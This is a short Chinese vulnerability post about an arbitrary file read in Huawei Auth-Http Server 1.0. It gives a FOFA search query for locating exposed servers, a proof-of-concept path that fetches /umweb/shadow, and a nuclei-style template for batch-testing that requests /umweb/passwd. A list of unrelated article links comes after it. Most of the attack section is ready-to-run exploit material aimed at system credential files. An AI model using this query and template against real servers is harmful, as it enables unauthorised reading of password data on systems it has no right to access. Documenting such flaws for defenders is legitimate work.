华为Auth-Http Serve任意文件读取

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFA:server="Huawei Auth-Http Server 1.0"

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

python 复制代码
id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'
相关推荐
ejinxian33 分钟前
微虚拟机 smolvm 与Docker 容器比较
运维·docker·容器·smolvm
ShiXZ21336 分钟前
PDF-OCR文件识别篇(八):配置、运维与排错
java·运维·ocr·dubbo·springboot
爱码少年1 小时前
Docker如何一次查看多个容器日志
运维·docker·容器
WI8LbH7881 小时前
Ubuntu 部署Harbor
linux·运维·ubuntu
huainingning2 小时前
华三ACL单向TCP互通组网-通过Established状态回包实现
运维·网络·tcp/ip
researcher-Jiang2 小时前
高性能计算之MPI:第一次MPI并行程序设计练习
linux·运维·服务器
Promise微笑2 小时前
工业微量水分监测:精密露点仪选型逻辑与行业应用实证深度报告
大数据·运维
中云DDoS CC防护蔡蔡3 小时前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
联盟分享专家4 小时前
垂直工具型 SaaS 的增长实战:如何把用户变成推广者?
运维
normanhere4 小时前
浪潮云国产化超融合规划和部署案例
服务器·网络